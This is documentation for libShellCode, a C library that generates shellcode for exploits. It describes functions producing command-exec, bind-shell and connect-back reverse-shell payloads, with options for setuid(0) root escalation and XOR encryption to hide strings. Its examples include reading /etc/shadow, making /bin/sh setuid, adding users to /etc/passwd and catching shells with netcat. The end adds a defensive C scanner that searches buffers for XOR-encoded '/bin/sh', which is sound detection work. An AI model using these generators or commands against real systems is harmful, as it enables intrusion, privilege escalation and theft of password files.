/*
 *     __   ___   _
 *    /  \ |   \ | | /\---------<ShellCode Generator Library>----------------->
 *   / /\ \| |\ \| |/ /
 *  / /__\ \    /|   /          libShellCode is an ORK's project!
 *  \______/ |\ \| | \          For comments, bug reports, etc ...
 *<--------|_| \_\_|\_\         contact me at orkmail<at>katamail<dot>com
 *
 *
 */

Index:
------
0   - How can I use the library in my exploits?
1   - Function description
1.1 - libShellCode_version()
1.2 - generate_write_SC()
1.3 - generate_file_write_SC()
1.4 - generate_exec_SC()
1.5 - generate_bind_SC()
1.6 - generate_connect_back_SC()


0 - How can I use the library in my exploits?
---------------------------------------------
To use this library in your software you have to include its header:

#include "libShellCode.h"

After this you can use the following library functions:

char *libShellCode_version();
char *generate_write_SC(int out, char *message, int setuid, int xor);
char *generate_file_write_SC(char *file, char *message, int setuid, int xor);
char *generate_exec_SC(char *prog, int setuid, int exit, int xor);
char *generate_bind_SC(char *prog, int setuid, int exit, int port, int fork, int xor);
char *generate_connect_back_SC(char *prog, int setuid, int exit, char *ip, int port, int xor);

Remember to include the library object when you compile the exploit.


1 - Function description
------------------------
This section describes the library functions one by one.


1.1 - libShellCode_version()
----------------------------

Prototype:
char *libShellCode_version();

Description:
This function returns the version of libShellCode.

Parameters:
none.

Return:
The function returns a pointer to a string containing the libShellCode version.


1.2 - generate_write_SC()
-------------------------

Prototype:
char *generate_write_SC(int out, char *message, int setuid, int xor);

Description:
This function generates a ShellCode that writes a message to stdout or stderr.

Parameters:  
out           Specify where to write: 
              1 = stdout 
              2 = stderr

message       A pointer to the message that you want to write

setuid        Specify if you want to execute setuid(0) or setreuid(0, 0) 
              before the open().
              0 = none
              1 = execute setuid(0)
              2 = execute setreuid(0, 0)

xor           Specify if you want to encrypt the shellcode.
              When the ShellCode is encrypted, a routine that decrypts the
              encrypted code at runtime is put before the standard ShellCode.
              0 = not encrypted
              1 = XOR encryption

Return:
The function returns a pointer to the generated ShellCode. The memory used for
the shellcode is allocated with malloc(), so remember to free() it.


1.3 - generate_file_write_SC()
------------------------------

Prototype:
char *generate_file_write_SC(char *file, char *message, int setuid, int xor);

Description: 
This function generates a ShellCode that writes a string to a file.
For example, you can add one user to /etc/passwd, or write a message for
the admin in the root directory :)

Parameters:
file          A pointer to the name of the file to which you want to write

message       A pointer to the message that you want to write

setuid        Specify if you want to execute setuid(0) or setreuid(0, 0) 
              before the open().
              0 = none
              1 = execute setuid(0)
              2 = execute setreuid(0, 0)

xor           Specify if you want to encrypt the shellcode.
              When the ShellCode is encrypted, a routine that decrypts the
              encrypted code at runtime is put before the standard ShellCode.
              0 = not encrypted
              1 = XOR encryption

Return:
The function returns a pointer to the generated ShellCode. The memory used for
the shellcode is allocated with malloc(), so remember to free() it.


1.4 - generate_exec_SC()
------------------------

Prototype:
char *generate_exec_SC(char *prog, int setuid, int exit, int xor);

Description: 
This function generates a ShellCode that executes the command specified by you.
You can execute either simple commands without parameters, like:
- /bin/sh 
- /usr/bin/id

or more complex commands with parameters, like:
- /usr/X11R6/bin/xterm -display 192.168.1.100:0.0
- cat /etc/shadow
- chmod +s /bin/sh

Parameters:  
prog          A pointer to the path of the command to execute (with parameters)
              (example: /bin/sh, /bin/cat /etc/passwd, ...)

setuid        Specify if you want to execute setuid(0) or setreuid(0, 0) 
              before the execve().
              0 = none
              1 = execute setuid(0)
              2 = execute setreuid(0, 0)

exit          Specify if you want to execute exit(0) after execve().
              If there is an error during the execve() and you have included
              the exit(0) call, the program terminates correctly; otherwise it
              crashes.
              0 = Don't execute exit(0)
              1 = execute exit(0)

xor           Specify if you want to encrypt the shellcode.
              When the ShellCode is encrypted, a routine that decrypts the
              encrypted code at runtime is put before the standard ShellCode.
              0 = not encrypted
              1 = XOR encryption

Return:
The function returns a pointer to the generated ShellCode. The memory used for
the shellcode is allocated with malloc(), so remember to free() it.


1.5 - generate_bind_SC()
------------------------

Prototype:
char *generate_bind_SC(char *prog, int setuid, int exit, int port, int fork, int xor);

Description: 
This function generates a ShellCode that binds a program to a port.

Parameters:
prog          A pointer to the path of the command to execute (with parameters)
              (example: /bin/sh, /bin/cat /etc/passwd, ...)

setuid        Specify if you want to execute setuid(0) or setreuid(0, 0) 
              before the execve().
              0 = none
              1 = execute setuid(0)
              2 = execute setreuid(0, 0)

exit          Specify if you want to execute exit(0) after execve().
              If there is an error during the execve() and you have included
              the exit(0) call, the program terminates correctly; otherwise it
              crashes.
              0 = Don't execute exit(0)
              1 = execute exit(0)

port          The number of the port you want to bind. The correct values are from 1
              to 65535. Remember that if you want to bind a port <= 1024 you must
              be root.

fork          Specify if you want to execute a fork() before execve().
              If you don't execute the fork() you can connect to the port only once,
              because the execve() call overwrites the process with the program you
              want to execute. If you execute the fork(), the child process calls
              execve() and the parent accepts the next connection.

xor           Specify if you want to encrypt the shellcode.
              When the ShellCode is encrypted, a routine that decrypts the
              encrypted code at runtime is put before the standard ShellCode.
              0 = not encrypted
              1 = XOR encryption

Return:
The function returns a pointer to the generated ShellCode. The memory used for
the shellcode is allocated with malloc(), so remember to free() it.


1.6 - generate_connect_back_SC()
--------------------------------

Prototype:
char *generate_connect_back_SC(char *prog, int setuid, int exit, char *ip, int port, int xor);

Description: 
This function generates a ShellCode that connects to an IP:Port and executes a program.
To use this ShellCode, remember to open a netcat session on the host you want to connect to.

Parameters:
prog          A pointer to the path of the command to execute (with parameters)
              (example: /bin/sh, /bin/cat /etc/passwd, ...)

setuid        Specify if you want to execute setuid(0) or setreuid(0, 0) 
              before the execve().
              0 = none
              1 = execute setuid(0)
              2 = execute setreuid(0, 0)

exit          Specify if you want to execute exit(0) after execve().
              If there is an error during the execve() and you have included
              the exit(0) call, the program terminates correctly; otherwise it
              crashes.
              0 = Don't execute exit(0)
              1 = execute exit(0)

ip            The IP address of the host you want to connect to. You must use
              dotted notation for the IP address. Remember that the IP must not
              contain a 0, so you can't use addresses like 127.0.0.1.

port          The number of the port you want to connect to. The correct values are
              from 1 to 65535.

xor           Specify if you want to encrypt the shellcode.
              When the ShellCode is encrypted, a routine that decrypts the
              encrypted code at runtime is put before the standard ShellCode.
              0 = not encrypted
              1 = XOR encryption

Return:
The function returns a pointer to the generated ShellCode. The memory used for
the shellcode is allocated with malloc(), so remember to free() it.
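
With the xor option documented for each generator, strings such as the program path no longer appear in clear in the generated bytes, so a plain string signature misses them. The following added example (not part of libShellCode) is a defender-side scan that tries every single-byte XOR key against a captured buffer; the single-byte key width, the name find_xor_string and the sample buffers are assumptions made for illustration, since this document does not describe the encoding routine.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Search buf for needle XORed with any single-byte key (assumed key width).
 * Returns the key (0 means the string is present unencoded) or -1 if absent;
 * *offset, when not NULL, receives the position of the match. */
int find_xor_string(const unsigned char *buf, size_t len,
                    const char *needle, size_t *offset)
{
    size_t nlen = strlen(needle);
    if (nlen == 0 || len < nlen)
        return -1;
    for (int key = 0; key < 256; key++) {
        for (size_t i = 0; i + nlen <= len; i++) {
            size_t j = 0;
            while (j < nlen && (buf[i + j] ^ key) == (unsigned char)needle[j])
                j++;
            if (j == nlen) {
                if (offset)
                    *offset = i;
                return key;
            }
        }
    }
    return -1;
}

/* Constructed sample: four filler bytes, then "/bin/sh" XORed with 0x5a. */
static const unsigned char sample_encoded[] = {
    0x41, 0x42, 0x43, 0x44, 0x75, 0x38, 0x33, 0x34, 0x75, 0x29, 0x32
};
/* Constructed sample that holds no program path under any key. */
static const unsigned char sample_clean[] = "GET /index.html HTTP/1.0";

int main(void)
{
    size_t off = 0;
    int key = find_xor_string(sample_encoded, sizeof sample_encoded,
                              "/bin/sh", &off);
    printf("encoded sample: key=0x%02x offset=%zu\n", key, off);
    printf("clean sample:   key=%d\n",
           find_xor_string(sample_clean, sizeof sample_clean - 1,
                           "/bin/sh", NULL));
    return 0;
}
```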
